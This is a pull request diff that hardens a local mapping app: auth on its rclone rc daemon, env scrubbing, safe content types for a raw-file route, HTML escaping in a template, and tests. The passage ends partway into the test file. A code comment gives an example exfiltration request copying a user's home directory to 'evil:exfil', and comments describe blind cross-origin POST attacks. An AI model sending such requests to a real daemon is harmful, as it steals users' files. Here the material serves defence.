### PR TITLE
Require auth on the rclone rc daemon, and escape untrusted strings in the map template

### DIFF
--- a/SECURITY.md
+++ b/SECURITY.md
@@ -69,6 +69,17 @@ and neither changes the trust model above:
   in the daemon's state file, so it is only as private as the local
   filesystem — which is consistent with the trust model above (local read is
   already out of scope; this guards the *browser* boundary).
+- **rclone rc daemon access token.** `shell/mounts.py` drives mounts through
+  `rclone rcd` on a loopback port, and the same reasoning applies to it: a
+  page in the user's browser can POST to `http://127.0.0.1:<port>/...`, and
+  because rclone merges URL query parameters into the rc call's arguments, a
+  CORS-*simple* request (POST, `text/plain`, no custom header — so no
+  preflight) is enough to drive it blind even though the reply is unreadable.
+  The daemon therefore mints a random secret at spawn and requires HTTP basic
+  auth on every call; the secret is handed to the child in the environment
+  (`RCLONE_RC_USER`/`RCLONE_RC_PASS`), never on argv, so it does not appear in
+  `ps`. Like the tile-daemon token it is recorded in the daemon's state file
+  and is only as private as the local filesystem.
 
 ## Network / supply chain
 

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -79,7 +79,24 @@ and neither changes the trust model above:
   auth on every call; the secret is handed to the child in the environment
   (`RCLONE_RC_USER`/`RCLONE_RC_PASS`), never on argv, so it does not appear in
   `ps`. Like the tile-daemon token it is recorded in the daemon's state file
-  and is only as private as the local filesystem.
+  and is only as private as the local filesystem. The child's environment also
+  has the whole `RCLONE_RC_*` namespace replaced rather than merged: rclone
+  configures every flag from an env var named after it, so an inherited
+  `RCLONE_RC_ALLOW_ORIGIN` would otherwise make the daemon answer with
+  `Access-Control-Allow-Origin: *` and hand a foreign page the ability to read
+  replies.
+- **`/api/fs/raw` never serves a document on the app's origin.** The route
+  reads any absolute path with a content-type guessed from its name, and it is
+  a plain GET, so a foreign page can *navigate* the browser to it (navigation
+  is not subject to CORS) and get a local `.html` executing as a first-party
+  page — inside the trust boundary, able to send `X-Fused` to `/api/run`. D4's
+  concession is about an `.html` file *you* open; this is one the attacker
+  picks. So every response from that route carries `X-Content-Type-Options:
+  nosniff`, and the scriptable types (`text/html`, `application/xhtml+xml`,
+  `image/svg+xml`) are downgraded to `text/plain` when — and only when —
+  `Sec-Fetch-Dest`/`Sec-Fetch-Mode` say the request is a document or frame
+  load. Subresource fetches are untouched, so a template reading the endpoint
+  as data, or an `<img>` pointing at an SVG icon, behaves exactly as before.
 
 ## Network / supply chain
 

--- a/fused_render/server.py
+++ b/fused_render/server.py
@@ -1771,6 +1771,59 @@ _PROXY_HEADERS = ("content-length", "content-range", "content-type",
                   "accept-ranges", "last-modified", "etag")
 
 
+# Media types a browser will EXECUTE as a document rather than display as data.
+_SCRIPTABLE_MEDIA = frozenset((
+    "text/html", "application/xhtml+xml", "image/svg+xml"))
+
+# Fetch destinations that make the response a document on THIS origin: a
+# top-level navigation, or a frame of one.
+_DOCUMENT_DESTS = frozenset(("document", "iframe", "frame", "embed", "object"))
+
+
+def _harden_raw(resp, request: Request):
+    """Stop /api/fs/raw from handing a page the app's own origin.
+
+    /api/fs/raw serves any absolute path with a content-type guessed from its
+    name, and it is a plain GET with no X-Fused, so it is top-level navigable
+    — and navigation is not subject to CORS. A foreign site can therefore point
+    the browser at a .html file it arranged to be on disk (a drive-by download
+    into ~/Downloads names the file for it) and get that file running as a
+    FIRST-PARTY document on http://127.0.0.1:<port>. From there it is inside
+    the trust boundary: it can send X-Fused: 1 and POST /api/run.
+
+    D4 concedes that an .html file *you open* runs same-origin. That is about
+    the user choosing the file; here the attacker chooses it, so the concession
+    does not stretch to cover it.
+
+    Two measures, both applied to every response this route produces:
+
+      * `nosniff` unconditionally — every in-tree consumer reads this endpoint
+        as data (.text()/.arrayBuffer()), so none of them can be hurt by it;
+
+      * scriptable types are downgraded to text/plain ONLY when the request is
+        a document load. The threat is navigating or framing; an <img src> at
+        an SVG cannot execute script, and coercing it would break a working
+        case to fix one that does not exist. Sec-Fetch-Dest is the right signal
+        and this file already relies on browsers always sending Sec-Fetch-*
+        (see the 307 branch in api_fs_raw). Sec-Fetch-Mode is checked too, for
+        a browser that sends the mode but not the dest.
+
+    Redirects are left alone: the 307 points at the object store, a foreign
+    origin, and is already gated to non-browser clients."""
+    if 300 <= resp.status_code < 400:
+        return resp
+    resp.headers["x-content-type-options"] = "nosniff"
+    dest = request.headers.get("sec-fetch-dest", "").lower()
+    mode = request.headers.get("sec-fetch-mode", "").lower()
+    if dest in _DOCUMENT_DESTS or mode == "navigate":
+        media = resp.headers.get("content-type", "").split(";")[0].strip().lower()
+        if media in _SCRIPTABLE_MEDIA:
+            # Keep serving the bytes — a download still saves the real file
+            # under its own name — just never as a document on this origin.
+            resp.headers["content-type"] = "text/plain; charset=utf-8"
+    return resp
+
+
 def _proxy_raw(upstream: str, request: Request):
     """Forward one GET/HEAD (with its Range header) to a mount's localhost
     rclone serve and stream the answer back. None when the serve can't be
@@ -3533,6 +3586,16 @@ def create_app(start_dir: str) -> FastAPI:
     @app.api_route("/api/fs/raw", methods=["GET", "HEAD"])
     async def api_fs_raw(path: str, request: Request, base: str | None = None,
                          pooled: str | None = None):
+        # Every response this route can produce goes through _harden_raw: the
+        # read has four exits (HEAD, the 307, the proxied mount read, and the
+        # local file) and three of them can put a scriptable content-type on
+        # this origin, so the hardening lives at the single choke point rather
+        # than being repeated — and cannot be missed by a new exit.
+        return _harden_raw(
+            await _api_fs_raw_read(path, request, base, pooled), request)
+
+    async def _api_fs_raw_read(path: str, request: Request, base: str | None,
+                               pooled: str | None):
         # Page-relative resolution (SPEC RH-1): a *relative* `path` is resolved against
         # the directory of `base` — the page's own absolute path, sent by the runtime's
         # fused.rawUrl(), the same contract /api/run uses via `html` (see the resolve at

--- a/fused_render/shell/mounts.py
+++ b/fused_render/shell/mounts.py
@@ -450,9 +450,6 @@ def _rcd_state_path() -> str:
 # it keeps working until it is replaced.
 _RCD_RC_USER = "fused-render"
 
-_rcd_auth_lock = threading.Lock()
-_rcd_auth_cache: dict[int, tuple[str, str]] = {}
-
 
 def _rcd_auth(port: int) -> tuple[str, str] | None:
     """The (user, pass) recorded for the daemon on `port`, or None when it has
@@ -460,38 +457,31 @@ def _rcd_auth(port: int) -> tuple[str, str] | None:
 
     Checked against rcd.json first, then the central registry — the reaper
     probes daemons belonging to OTHER homes, whose rcd.json we cannot read.
-    Successful lookups are memoized per port because _rc runs on every
-    rc-routed call; a miss is not cached, so the spawn path (which writes
-    state only after the daemon answers) heals itself on the next call."""
-    with _rcd_auth_lock:
-        hit = _rcd_auth_cache.get(port)
-    if hit is not None:
-        return hit
-    found = None
+
+    Deliberately NOT memoized. rcd is shared per-home and outlives us, so the
+    daemon on a given port can be replaced — with a new secret — by another
+    process at any time, and a cache keyed on the port alone would pin this
+    process to the dead secret: every call 401s, _live_rcd_port reads that as
+    "no daemon", and _ensure_rcd_locked spawns a second rcd that nothing owns
+    (precisely the orphan the registry and reaper exist to clean up). Keying
+    on (port, pid) like _live_port_cache would not help either — the pid comes
+    out of the same file the credential does, so a correct lookup has to read
+    it regardless.
+
+    The read is free in practice: _live_rcd_port already reads this exact file
+    unconditionally on every rc-routed call (its memo skips the ~3s core/pid
+    probe, not the file), so the state file is page-cached and this adds no
+    round trip. The file is the single source of truth for the daemon's
+    identity AND its credential, which keeps the two from drifting apart."""
     state = storage.read_json(_rcd_state_path())
     if isinstance(state, dict) and state.get("port") == port and state.get("rc_pass"):
-        found = (state.get("rc_user") or _RCD_RC_USER, state["rc_pass"])
-    else:
-        reg = storage.read_json(_rcd_registry_path())
-        if isinstance(reg, list):
-            for e in reg:
-                if isinstance(e, dict) and e.get("port") == port and e.get("rc_pass"):
-                    found = (e.get("rc_user") or _RCD_RC_USER, e["rc_pass"])
-                    break
-    if found is not None:
-        with _rcd_auth_lock:
-            _rcd_auth_cache[port] = found
-    return found
-
-
-def _forget_rcd_auth(port: int | None = None) -> None:
-    """Drop memoized credentials — for `port` (a fresh daemon may reuse a port
-    with a NEW secret) or, with no argument, entirely."""
-    with _rcd_auth_lock:
-        if port is None:
-            _rcd_auth_cache.clear()
-        else:
-            _rcd_auth_cache.pop(port, None)
+        return (state.get("rc_user") or _RCD_RC_USER, state["rc_pass"])
+    reg = storage.read_json(_rcd_registry_path())
+    if isinstance(reg, list):
+        for e in reg:
+            if isinstance(e, dict) and e.get("port") == port and e.get("rc_pass"):
+                return (e.get("rc_user") or _RCD_RC_USER, e["rc_pass"])
+    return None
 
 
 def _rcd_registry_path() -> str:
@@ -713,9 +703,6 @@ def write_rcd_state(port: int, pid: int, log_path: str | None = None,
     if auth:
         state["rc_user"], state["rc_pass"] = auth
     storage.write_json(_rcd_state_path(), state)
-    # A new daemon may land on a recycled port with a different secret, so the
-    # memoized credentials for that port must not survive this write.
-    _forget_rcd_auth(port)
     # Also record in the central registry so a future run can reap this daemon
     # even after its home dir (and this rcd.json) is deleted (INCIDENT: leaked
     # rcd daemons outliving pytest runs / deleted worktrees for days).

--- a/fused_render/shell/mounts.py
+++ b/fused_render/shell/mounts.py
@@ -12,7 +12,10 @@ over its local HTTP API (mount/mount, mount/unmount, mount/listmounts) —
 one cross-platform mount API instead of per-OS umount commands. The daemon
 is spawned with its {port, pid} recorded in home_dir()/rcd.json and reused
 across server runs (the spawn-or-reuse pattern of the tile-server daemons,
-templates/geotiff/tile_server.py). Unmount is an explicit user action.
+templates/geotiff/tile_server.py). It requires basic auth with a random
+per-daemon secret, recorded alongside port/pid — see the _rcd_auth block;
+loopback is not a boundary against the browser. Unmount is an explicit user
+action.
 
 Whether the daemon (and its mounts) survives the server dying depends on
 FUSED_RENDER_RCLONE_PERSIST (see _rclone_should_persist). In DEV (dev.sh sets
@@ -26,6 +29,7 @@ rcd.json stale and respawns.
 Store: home_dir()/mounts.json, whole-file last-write-wins like
 shell/bookmarks.py. Same acyclic-router + X-Fused-guard conventions.
 """
+import base64
 import collections
 import configparser
 import email.utils
@@ -34,6 +38,7 @@ import json
 import logging
 import os
 import re
+import secrets
 import shutil
 import signal
 import socket
@@ -416,6 +421,79 @@ def _rcd_state_path() -> str:
     return os.path.join(storage.home_dir(), "rcd.json")
 
 
+# ------------------------------------------------------------ rcd rc auth
+#
+# The rc daemon MUST require authentication. It was previously spawned with
+# --rc-no-auth, which made it a fully unauthenticated HTTP API on loopback —
+# and the loopback bind is not a boundary against the browser: any page the
+# user has open can POST to http://127.0.0.1:<port>/... The reply is
+# unreadable cross-origin (rclone sends no CORS headers), but rclone merges
+# URL query parameters into the rc call's arguments, so a CORS-SIMPLE request
+# with no preflight — POST, text/plain, no custom headers — is enough to drive
+# it blind: /sync/copy?srcFs=/Users/you&dstFs=evil:exfil, or /core/command,
+# which exposes the whole rclone CLI. The random port is not a secret a
+# 16-bit spray can't find. This is exactly the threat the tile-daemon token
+# (D122, SECURITY.md) exists to close, and rcd — with a far bigger API —
+# had no equivalent.
+#
+# So each daemon mints a random secret at spawn and requires HTTP basic auth,
+# mirroring D122. The secret is passed to the child through the ENVIRONMENT
+# (RCLONE_RC_USER/RCLONE_RC_PASS), never on argv, so it does not show up in
+# `ps` for other local users. It is recorded alongside {port, pid} in
+# rcd.json — and in the central registry, so reap_stale_rcd can still probe
+# core/pid on a daemon whose own home dir is gone — which puts it at the same
+# privacy level as the tile-daemon token: only as private as the local
+# filesystem, which the trust model already concedes.
+#
+# Back-compat: a daemon recorded WITHOUT a secret (spawned by an older build,
+# still alive across an upgrade) is called without an Authorization header, so
+# it keeps working until it is replaced.
+_RCD_RC_USER = "fused-render"
+
+_rcd_auth_lock = threading.Lock()
+_rcd_auth_cache: dict[int, tuple[str, str]] = {}
+
+
+def _rcd_auth(port: int) -> tuple[str, str] | None:
+    """The (user, pass) recorded for the daemon on `port`, or None when it has
+    none on record (pre-auth daemon, or state not written yet).
+
+    Checked against rcd.json first, then the central registry — the reaper
+    probes daemons belonging to OTHER homes, whose rcd.json we cannot read.
+    Successful lookups are memoized per port because _rc runs on every
+    rc-routed call; a miss is not cached, so the spawn path (which writes
+    state only after the daemon answers) heals itself on the next call."""
+    with _rcd_auth_lock:
+        hit = _rcd_auth_cache.get(port)
+    if hit is not None:
+        return hit
+    found = None
+    state = storage.read_json(_rcd_state_path())
+    if isinstance(state, dict) and state.get("port") == port and state.get("rc_pass"):
+        found = (state.get("rc_user") or _RCD_RC_USER, state["rc_pass"])
+    else:
+        reg = storage.read_json(_rcd_registry_path())
+        if isinstance(reg, list):
+            for e in reg:
+                if isinstance(e, dict) and e.get("port") == port and e.get("rc_pass"):
+                    found = (e.get("rc_user") or _RCD_RC_USER, e["rc_pass"])
+                    break
+    if found is not None:
+        with _rcd_auth_lock:
+            _rcd_auth_cache[port] = found
+    return found
+
+
+def _forget_rcd_auth(port: int | None = None) -> None:
+    """Drop memoized credentials — for `port` (a fresh daemon may reuse a port
+    with a NEW secret) or, with no argument, entirely."""
+    with _rcd_auth_lock:
+        if port is None:
+            _rcd_auth_cache.clear()
+        else:
+            _rcd_auth_cache.pop(port, None)
+
+
 def _rcd_registry_path() -> str:
     """Path to the central registry of every rcd this machine has spawned,
     one entry per home (state) dir.
@@ -432,7 +510,7 @@ def _rcd_registry_path() -> str:
     return os.path.join(base, "rcd-registry.json")
 
 
-def _register_rcd(pid: int, port: int) -> None:
+def _register_rcd(pid: int, port: int, auth: tuple[str, str] | None = None) -> None:
     """Record a freshly spawned daemon in the central registry, keyed by its
     home dir (a new daemon for the same home replaces the old record). Purely
     additive breadcrumb for reap_stale_rcd — a failure here must never fail a
@@ -442,7 +520,12 @@ def _register_rcd(pid: int, port: int) -> None:
         reg = storage.read_json(_rcd_registry_path())
         entries = [e for e in reg if isinstance(e, dict)] if isinstance(reg, list) else []
         entries = [e for e in entries if e.get("dir") != home]  # dedupe by home
-        entries.append({"pid": pid, "port": port, "dir": home})
+        entry = {"pid": pid, "port": port, "dir": home}
+        if auth:
+            # So a later run can still authenticate core/pid against this
+            # daemon after its home (and rcd.json) is gone — see _rcd_auth.
+            entry["rc_user"], entry["rc_pass"] = auth
+        entries.append(entry)
         storage.write_json(_rcd_registry_path(), entries)
     except OSError:
         logger.warning("rcd registry write failed", exc_info=True)
@@ -611,36 +694,52 @@ def _copytruncate_rcd_log() -> None:
         logger.warning("rcd log copytruncate failed", exc_info=True)
 
 
-def write_rcd_state(port: int, pid: int, log_path: str | None = None) -> None:
+def write_rcd_state(port: int, pid: int, log_path: str | None = None,
+                    auth: tuple[str, str] | None = None) -> None:
     # Record the log path alongside port/pid so tooling (and a human tailing
     # the daemon) can find it without reconstructing home_dir() (INCIDENT).
     # spawner_pid records WHO spawned the daemon: rcd is shared per-home, so a
     # later process reusing it (e.g. the macOS app alongside a CLI server) must
     # be able to tell on quit whether the daemon is its own to stop — see
     # stop_local_rcd's ownership gate.
-    storage.write_json(
-        _rcd_state_path(),
-        {
-            "port": port,
-            "pid": pid,
-            "log": log_path or _rcd_log_path(),
-            "spawner_pid": os.getpid(),
-        },
-    )
+    # rc_user/rc_pass: the daemon's basic-auth secret, so any later process (or
+    # a restarted server) reusing this shared daemon can still call it.
+    state = {
+        "port": port,
+        "pid": pid,
+        "log": log_path or _rcd_log_path(),
+        "spawner_pid": os.getpid(),
+    }
+    if auth:
+        state["rc_user"], state["rc_pass"] = auth
+    storage.write_json(_rcd_state_path(), state)
+    # A new daemon may land on a recycled port with a different secret, so the
+    # memoized credentials for that port must not survive this write.
+    _forget_rcd_auth(port)
     # Also record in the central registry so a future run can reap this daemon
     # even after its home dir (and this rcd.json) is deleted (INCIDENT: leaked
     # rcd daemons outliving pytest runs / deleted worktrees for days).
-    _register_rcd(pid, port)
+    _register_rcd(pid, port, auth)
 
 
-def _rc(port: int, method: str, params: dict | None = None, timeout: float = 30):
+def _rc(port: int, method: str, params: dict | None = None, timeout: float = 30,
+        auth: tuple[str, str] | None = None):
     """One rc call. Returns the decoded JSON on 200; raises RuntimeError with
-    rclone's error message on any failure."""
+    rclone's error message on any failure.
+
+    `auth` is the daemon's basic-auth credential; when omitted it is looked up
+    from the recorded state (_rcd_auth). The spawn path passes it explicitly
+    because it calls core/pid before the state is written."""
     raw = json.dumps(params or {}).encode()
+    headers = {"Content-Type": "application/json"}
+    creds = auth or _rcd_auth(port)
+    if creds:
+        token = base64.b64encode(f"{creds[0]}:{creds[1]}".encode()).decode()
+        headers["Authorization"] = f"Basic {token}"
     req = urllib.request.Request(
         f"http://127.0.0.1:{port}/{method}",
         data=raw,
-        headers={"Content-Type": "application/json"},
+        headers=headers,
         method="POST",
     )
     try:
@@ -900,12 +999,19 @@ def _ensure_rcd_locked() -> int:
     # DEVNULL: --log-file captures everything, and a detached daemon has no
     # console to write to anyway.
     log_path = _rotate_rcd_log()
+    # The rc API requires basic auth (see the _rcd_auth block above): a random
+    # per-daemon secret, handed over in the ENVIRONMENT rather than on argv so
+    # it is not visible in `ps` to other local users. Without it the daemon is
+    # an unauthenticated filesystem API that any page in the user's browser can
+    # drive blind with a no-preflight cross-origin POST.
+    auth = (_RCD_RC_USER, secrets.token_urlsafe(32))
     subprocess.Popen(
-        [bin_, "rcd", "--rc-no-auth", "--use-server-modtime",
+        [bin_, "rcd", "--use-server-modtime",
          f"--rc-addr=127.0.0.1:{port}",
          f"--log-file={log_path}", "--log-level", "INFO"],
         stdout=subprocess.DEVNULL,
         stderr=subprocess.DEVNULL,
+        env={**os.environ, "RCLONE_RC_USER": auth[0], "RCLONE_RC_PASS": auth[1]},
         # Dev (FUSED_RENDER_RCLONE_PERSIST set): setsid into its own session so
         # the daemon outlives watchfiles server restarts. Production (unset):
         # stay a normal child so app teardown reaps it (on Linux via the
@@ -916,8 +1022,8 @@ def _ensure_rcd_locked() -> int:
     deadline = time.time() + 10
     while time.time() < deadline:
         try:
-            pid = _rc(port, "core/pid", timeout=2).get("pid", 0)
-            write_rcd_state(port, pid, log_path)
+            pid = _rc(port, "core/pid", timeout=2, auth=auth).get("pid", 0)
+            write_rcd_state(port, pid, log_path, auth)
             return port
         except RuntimeError:
             time.sleep(0.2)

--- a/fused_render/shell/mounts.py
+++ b/fused_render/shell/mounts.py
@@ -451,6 +451,34 @@ def _rcd_state_path() -> str:
 _RCD_RC_USER = "fused-render"
 
 
+def _rcd_child_env(auth: tuple[str, str]) -> dict:
+    """The rcd child's environment: ours inherited, but with the whole
+    RCLONE_RC_* namespace REPLACED rather than merged.
+
+    rclone configures every flag from an env var named after it, so an
+    inherited RCLONE_RC_* can reconfigure the very interface we are trying to
+    lock down — and setting our own two keys on top of os.environ does not
+    displace the others. Verified against rclone v1.74.4: an inherited
+    RCLONE_RC_ALLOW_ORIGIN=* makes the daemon answer with
+    `Access-Control-Allow-Origin: *` AND `Access-Control-Allow-Headers:
+    Authorization`, which hands a foreign page the ability to READ replies —
+    removing the read-blindness the loopback boundary otherwise leaves intact.
+    RCLONE_RC_NO_AUTH=true and RCLONE_RC_USER_FROM_HEADER happened not to beat
+    an explicit user/pass in that version, but that is version-dependent luck,
+    not a property to build on.
+
+    Nothing in this repo sets RCLONE_RC_*; the rc interface is entirely ours to
+    configure, so the safe rule is that none of it comes from ambient env. The
+    rest of RCLONE_* (RCLONE_CONFIG, RCLONE_CONFIG_PASS, ...) is legitimate
+    user configuration for the remotes themselves and is inherited untouched.
+    RCLONE_RC_NO_AUTH is pinned to "false" explicitly rather than merely
+    dropped, so the intent survives a future default flip."""
+    env = {k: v for k, v in os.environ.items() if not k.startswith("RCLONE_RC_")}
+    env["RCLONE_RC_USER"], env["RCLONE_RC_PASS"] = auth
+    env["RCLONE_RC_NO_AUTH"] = "false"
+    return env
+
+
 def _rcd_auth(port: int) -> tuple[str, str] | None:
     """The (user, pass) recorded for the daemon on `port`, or None when it has
     none on record (pre-auth daemon, or state not written yet).
@@ -990,7 +1018,9 @@ def _ensure_rcd_locked() -> int:
     # per-daemon secret, handed over in the ENVIRONMENT rather than on argv so
     # it is not visible in `ps` to other local users. Without it the daemon is
     # an unauthenticated filesystem API that any page in the user's browser can
-    # drive blind with a no-preflight cross-origin POST.
+    # drive blind with a no-preflight cross-origin POST. _rcd_child_env also
+    # clears the inherited RCLONE_RC_* namespace, which could otherwise
+    # reconfigure the interface out from under us.
     auth = (_RCD_RC_USER, secrets.token_urlsafe(32))
     subprocess.Popen(
         [bin_, "rcd", "--use-server-modtime",
@@ -998,7 +1028,7 @@ def _ensure_rcd_locked() -> int:
          f"--log-file={log_path}", "--log-level", "INFO"],
         stdout=subprocess.DEVNULL,
         stderr=subprocess.DEVNULL,
-        env={**os.environ, "RCLONE_RC_USER": auth[0], "RCLONE_RC_PASS": auth[1]},
+        env=_rcd_child_env(auth),
         # Dev (FUSED_RENDER_RCLONE_PERSIST set): setsid into its own session so
         # the daemon outlives watchfiles server restarts. Production (unset):
         # stay a normal child so app teardown reaps it (on Linux via the

--- a/fused_render/templates/map/template.html
+++ b/fused_render/templates/map/template.html
@@ -497,6 +497,19 @@ loadScript("https://unpkg.com/@highlightjs/cdn-assets@11.9.0/highlight.min.js").
 const qs = id => document.getElementById(id);
 const P = fused.params;
 
+// Escape before interpolating ANY value into an innerHTML string or into an
+// HTML attribute. The trust model says a file you OPEN may render with full
+// HTML/JS power — but that does not extend to strings that arrive incidentally
+// and land in this template's own chrome: URL params (?dir=, ?open=, both read
+// at boot), backend error text that echoes those params back, filenames and
+// paths from a directory listing (a bucket or a shared folder can name a file
+// anything), sub-layer names read out of a GPKG/KML, and geocoder results from
+// a third-party API. Injected script here is same-origin with the shell, so it
+// can send X-Fused and reach /api/run — i.e. it walks around the D36 guard.
+// Attributes are quoted with ", which &quot; below neutralizes.
+const esc = s => String(s ?? "").replace(/[&<>"']/g, c => (
+  { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" }[c]));
+
 // Windows "Copy as path" wraps the path in double quotes; a quoted path isn't
 // absolute, so os.path.abspath would join it onto the template dir. Strip them.
 const cleanPath = s => String(s || "").trim().replace(/^["']|["']$/g, "").trim();
@@ -621,7 +634,7 @@ function renderFileList() {
     div.className = "file" + (selPath === e.path ? " selected" : "") + (L && L.loading ? " loading" : "");
 
     if (e.kind === "dir") {
-      div.innerHTML = `<span class="ic">${KIND_ICON.dir}</span><span class="nm">${e.name}</span><span class="kd">open</span>`;
+      div.innerHTML = `<span class="ic">${KIND_ICON.dir}</span><span class="nm">${esc(e.name)}</span><span class="kd">open</span>`;
       div.onclick = () => loadDir(e.path);
     } else {
       const ic = document.createElement("span"); ic.className = "ic";
@@ -931,7 +944,7 @@ function groupCard(groupKey, groupName, members) {
   head.innerHTML =
     `<span class="lg-chev ${collapsed ? "" : "open"}">${CHEV}</span>` +
     `<span class="ic">${KIND_ICON.dir}</span>` +
-    `<span class="lg-nm" title="${groupKey}">${groupName}</span>` +
+    `<span class="lg-nm" title="${esc(groupKey)}">${esc(groupName)}</span>` +
     `<span class="lc-badge">${members.length} layers</span>` +
     `<button class="lc-eye ${anyVisible ? "" : "off"}" title="Toggle all layers">${anyVisible ? EYE : EYEOFF}</button>` +
     `<button class="lc-dots" title="More">${DOTS}</button>`;
@@ -965,17 +978,17 @@ function layerCard(L) {
 
   const h = document.createElement("div"); h.className = "lc-h";
   if (L.loading) {
-    h.innerHTML = `<span class="spin"></span><span class="lc-nm" title="${tp}">${L.name}</span><span class="lc-badge">loading</span>`;
+    h.innerHTML = `<span class="spin"></span><span class="lc-nm" title="${esc(tp)}">${esc(L.name)}</span><span class="lc-badge">loading</span>`;
   } else if (d && d.status !== "ok") {
     h.innerHTML =
       `<span class="lc-swatch" style="background:${d.status === "error" ? "var(--bad)" : "var(--warn)"}"></span>` +
-      `<span class="lc-nm" title="${tp}">${L.name}</span>` +
+      `<span class="lc-nm" title="${esc(tp)}">${esc(L.name)}</span>` +
       `<button class="lc-dots" title="More">${DOTS}</button>`;
   } else {
     const preparing = d.kind === "vector_tiles_mvt" && L.mvt && !L.mvt.ready && L.mvt.phase !== "error";
     h.innerHTML =
       (preparing ? `<span class="spin"></span>` : `<span class="lc-swatch" style="${swatchStyle(L)}"></span>`) +
-      `<span class="lc-nm" title="${tp}">${L.name}</span>` +
+      `<span class="lc-nm" title="${esc(tp)}">${esc(L.name)}</span>` +
       `<span class="lc-badge">${preparing ? "tiles " + (L.mvt.pct || 0) + "%" : kindBadge(d)}</span>` +
       `<button class="lc-eye ${L.visible ? "" : "off"}" title="Toggle visibility">${L.visible ? EYE : EYEOFF}</button>` +
       `<button class="lc-dots" title="More">${DOTS}</button>`;
@@ -1089,7 +1102,7 @@ function renderStyleDock() {
   qs("sp-kind").textContent = d.kind ? kindBadge(d) : "";
   body.innerHTML = "";
   if (d.status !== "ok") {
-    body.innerHTML = `<div class="sp-empty">${d.message || (d.error && d.error.message) || "This layer couldn't be rendered."}</div>`;
+    body.innerHTML = `<div class="sp-empty">${esc(d.message || (d.error && d.error.message) || "This layer couldn't be rendered.")}</div>`;
     return;
   }
 
@@ -1268,7 +1281,7 @@ async function updateCodeViewer(path) {
   const ext = (name.split(".").pop() || "").toLowerCase();
   if (!TEXT_EXT.includes(ext)) {
     langEl.textContent = ext || "data";
-    body.innerHTML = `<div class="cp-note">Binary dataset — no source to show.\n\n${path}</div>`;
+    body.innerHTML = `<div class="cp-note">Binary dataset — no source to show.\n\n${esc(path)}</div>`;
     return;
   }
   langEl.textContent = ext;
@@ -1288,7 +1301,7 @@ async function updateCodeViewer(path) {
     wrap.appendChild(g); wrap.appendChild(pre);
     body.innerHTML = ""; body.appendChild(wrap);
   } catch (e) {
-    body.innerHTML = `<div class="cp-note">Couldn't read file:\n${e.message}</div>`;
+    body.innerHTML = `<div class="cp-note">Couldn't read file:\n${esc(e.message)}</div>`;
   }
 }
 
@@ -1358,7 +1371,7 @@ async function geocode(q) {
       const name = p.name || p.street || p.city || "Result";
       const sub = [p.city, p.state, p.country].filter(Boolean).join(", ");
       const div = document.createElement("div"); div.className = "geores";
-      div.innerHTML = `<div class="g1">${name}</div><div class="g2">${sub}</div>`;
+      div.innerHTML = `<div class="g1">${esc(name)}</div><div class="g2">${esc(sub)}</div>`;
       div.onclick = () => {
         if (p.extent) { const [w,nn,ee,ss] = p.extent; map.fitBounds([[w,ss],[ee,nn]], { padding: 60, maxZoom: 15, duration: 900 }); }
         else map.flyTo({ center: [c[0], c[1]], zoom: 13, duration: 900 });
@@ -1387,7 +1400,7 @@ qs("importpath").onkeydown = e => { if (e.key === "Enter" && cleanPath(e.target.
 let toastTimer = null;
 function toast(kind, title, msg) {
   const t = qs("toast"); t.className = kind === "warn" ? "warn" : kind === "bad" ? "bad" : "";
-  t.innerHTML = `<div class="tx"><b>${title}</b>${msg ? `<span>${String(msg).slice(0,300)}</span>` : ""}</div><button class="tclose">×</button>`;
+  t.innerHTML = `<div class="tx"><b>${esc(title)}</b>${msg ? `<span>${esc(String(msg).slice(0,300))}</span>` : ""}</div><button class="tclose">×</button>`;
   t.classList.remove("hidden");
   t.querySelector(".tclose").onclick = () => t.classList.add("hidden");
   clearTimeout(toastTimer);

--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -53,8 +53,8 @@ def _reap_test_rcd_daemons():
     tracked = []  # (pid, home) recorded this session
     original = mounts.write_rcd_state
 
-    def _tracking_write_rcd_state(port, pid, log_path=None):
-        original(port, pid, log_path)
+    def _tracking_write_rcd_state(port, pid, log_path=None, auth=None):
+        original(port, pid, log_path, auth)
         try:
             tracked.append((pid, mounts.storage.home_dir()))
         except Exception:

--- a/tests/test_map_template_escaping.py
+++ b/tests/test_map_template_escaping.py
@@ -1,0 +1,181 @@
+"""The map template escapes untrusted strings before they reach innerHTML.
+
+SECURITY.md's D3/D4 concession — no output sanitization in the render path —
+is about the CONTENT OF A FILE YOU CHOSE TO OPEN. It does not extend to
+strings that arrive incidentally and land in this template's own chrome:
+
+  * `?dir=` and `?open=`, read at boot, so a crafted link to the app's own
+    built-in template is reflected XSS with no click;
+  * backend error text that echoes those params back (discover.py returns
+    f"Not a directory: {base}"), rendered by the toast;
+  * filenames, directory names and absolute paths from a listing — a shared
+    folder, an unzipped archive or a mounted bucket can name an entry
+    anything, and `"` in a path breaks out of a title="..." attribute;
+  * sub-layer names read out of a GPKG/KML;
+  * geocoder results from a third-party API.
+
+Injected script here is same-origin with the shell, so it can set X-Fused and
+POST /api/run — it walks around the D36 guard rather than breaking it.
+
+The escaping behaviour is checked by running the template's REAL `esc` under
+node (the `_js_block` approach of test_calls.py / test_log_studio_detail.py —
+a copy would keep passing after the shipping code regressed). The second test
+is the regression guard that actually matters: it re-derives every `${...}`
+reaching an innerHTML sink and fails on a new one that is neither escaped nor
+a known-constant fragment.
+"""
+import json
+import os
+import re
+import shutil
+import subprocess
+
+import pytest
+
+import fused_render
+
+
+TEMPLATE = os.path.join(os.path.dirname(os.path.abspath(fused_render.__file__)),
+                        "templates", "map", "template.html")
+
+
+def _src():
+    return open(TEMPLATE, encoding="utf-8").read()
+
+
+def _esc_decl(src):
+    """The shipping `const esc = ...;` declaration, verbatim."""
+    m = re.search(r"^const esc = .*?;$", src, re.S | re.M)
+    assert m, "map template no longer declares `esc` — did the escaping go away?"
+    return m.group(0)
+
+
+def _run_esc(values, tmp_path):
+    node = shutil.which("node")
+    if not node:  # pragma: no cover - node is preinstalled on the CI runners
+        pytest.skip("node is required to drive the template's JS")
+    harness = tmp_path / "harness.mjs"
+    harness.write_text(
+        _esc_decl(_src())
+        + f"\nconsole.log(JSON.stringify({json.dumps(values)}.map(esc)));\n",
+        encoding="utf-8")
+    out = subprocess.run([node, str(harness)], capture_output=True, text=True,
+                         timeout=60)
+    assert out.returncode == 0, out.stderr
+    return json.loads(out.stdout)
+
+
+# ---------------------------------------------------------------- behaviour
+
+def test_esc_neutralizes_markup_and_attribute_breaks(tmp_path):
+    payloads = [
